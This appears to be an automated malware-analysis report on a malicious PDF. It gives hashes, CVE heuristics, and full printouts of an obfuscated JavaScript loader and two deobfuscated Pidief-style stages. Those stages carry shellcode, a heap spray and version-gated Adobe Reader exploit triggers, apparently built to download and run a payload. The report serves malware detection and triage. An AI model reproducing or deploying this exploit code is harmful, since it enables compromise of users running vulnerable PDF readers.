PDF malware analysis — malicious · 432a4c03ccfbfb9d

MALICIOUS

PDF

6.2 KB Authoring application: Ledilakewavajori (via Damoqkqolo) First seen: 2026-05-11

MD5: afd6d9dd138b1075d7d5063b86e2d55a SHA-1: 8a1a3f02ff06518e2153cc2caa25417b9f9b3d48 SHA-256: 432a4c03ccfbfb9dd51a4a076510dd2341e4857ee6b25e30891df4af7f1bd5c5

408 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 9

media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324

PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927

PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992

PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH

A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT

One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0015_000.js`	pdf-javascript-stream	PDF /JS object 15 at offset 0x12F0	1439 bytes
SHA-256: `b8d0f5250f46f6d936951e7a2a40989fac0e20ec13d4dd9d1e8d550d55d2ef0d`
Preview script First 1,000 lines of the extracted script function uN(eX,r,fY){return eX.substr(r,fY);}var uZ=144;var l=uN("lenxRV",0,3)+uN("NSrXgthNXrS",4,3);var x="";var d=100-100;var n=new String("cha"+uN("rCoGSV",0,3)+uN("deAl9q",0,3)+uN("tzVcv",0,1));var lU=uN("getPaoBV3",0,5)+uN("geNthrkz",0,5)+uN("xM8zWordMz8x",4,4);var oR=String("charC"+"odeAt");var j=String;;var p=88-86;var nU=1;var wV=this;var dO=37-36;var kV="fr"+"om"+uN("CheEDf",0,2)+uN("i1Far1iF",3,2)+"Co"+uN("AotdetoA",3,2);var lW=new String("%lpOR".substr(0,1));var sR=852-836;var h=String("ge"+uN("tPh7UA",0,2)+"ag"+"eN"+uN("umE2D",0,2)+uN("MV6jWoMjV6",4,2)+uN("rd7JQ",0,2)+"s");var v="ev"+uN("alPVAE",0,2);var dI="subs"+"tr";var eD=wV[v];function fE(sRM,f,sB,iV,yT){x=x+sRM};function eN(b,dE,f,sB,iV,yT){return b-dE};function cJ(sRM,f,sB,iV,yT){return lW+sRM};function bS(eP,pI,f,sB,iV,yT){return eP[pI]};var eNK=wV[h](nU);function eNQ(eP,f,sB,iV,yT){return eP[l]-p};function sH(sRM,f,sB,iV,yT){var sRM=parseInt(sRM,sR);sRM=t(sRM);sRM=bS(j,kV)(sRM);return sRM}function jK(sRM,f,sB,iV,yT){var gL=eNQ(sRM);sRM=rS(sRM,gL);return sH(sRM)};function eF(xQ,eV,f,sB,iV,yT){return xQ[n](eV)};function t(fQ,yTK,f,sB,iV,yT){return fQ^uZ;};var oR=wV[oR];function cJI(sBA,f,sB,iV,yT){return wV[lU](nU,sBA)};function kP(b,dE,f,sB,iV,yT){return b+dE};var fO=new j();function rS(eP,eV,f,sB,iV,yT){return eP[dI](eV,p)};function yF(sBA,f,sB,iV,yT){var vY=cJI(sBA);vY=jK(vY);return vY;}for(var sBA=d;sBA<eNK;sBA++){var sX=yF(sBA);fE(sX);}eD(x);
`legacy_pdfkit_stage_000.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3750 bytes
SHA-256: `fe7d519ba67df9eff03224702e30a40d9fb613813be330660ad03060119b9905`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%'; var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5='; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); u = for_unescape(u); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.title; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function for_unescape(str) { var out = ""; str = bin2hex(str); g = Math.round(str.length / 4); if (g != str.length /4) str+="00"; for(var i=0; i < str.length; i+=4) { out+="%u" + str.substr(i+2, 2) + str.substr(i, 2); } return out; } function bin2hex (s){ var i, f = 0, a = []; s += ''; f = s.length; for (i = 0; i<f; i++) { a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase(); } return a.join(''); } function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); a`*��
`legacy_pdfkit_stage_001.js`	deobfuscated-js	getPageWords-XOR Pidief stage normalized at offset 0x0	3773 bytes
SHA-256: `59214ebbe64205f09923fc70e3adce5c0eca3732b939abddc850b66c349333cc`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script ===== var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%'; var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5='; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); u = for_unescape(u); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.title; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str[i]); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function for_unescape(str) { var out = ""; str = bin2hex(str); g = Math.round(str.length / 4); if (g != str.length /4) str+="00"; for(var i=0; i < str.length; i+=4) { out+="%u" + str.substr(i+2, 2) + str.substr(i, 2); } return out; } function bin2hex (s){ var i, f = 0, a = []; s += ''; f = s.length; for (i = 0; i<f; i++) { a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase(); } return a.join(''); } function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); var sf="1.000000000.000000000.1337 : 3.13.37"; util.printd(sf, new Date()); try { media.newPlayer(null); } catch(e) {} util.printd(sf, new Date()); } } U2UcYKr(); ^^^^>>>>>^^========***�

Open this report in the interactive analyzer, or submit your own file for analysis.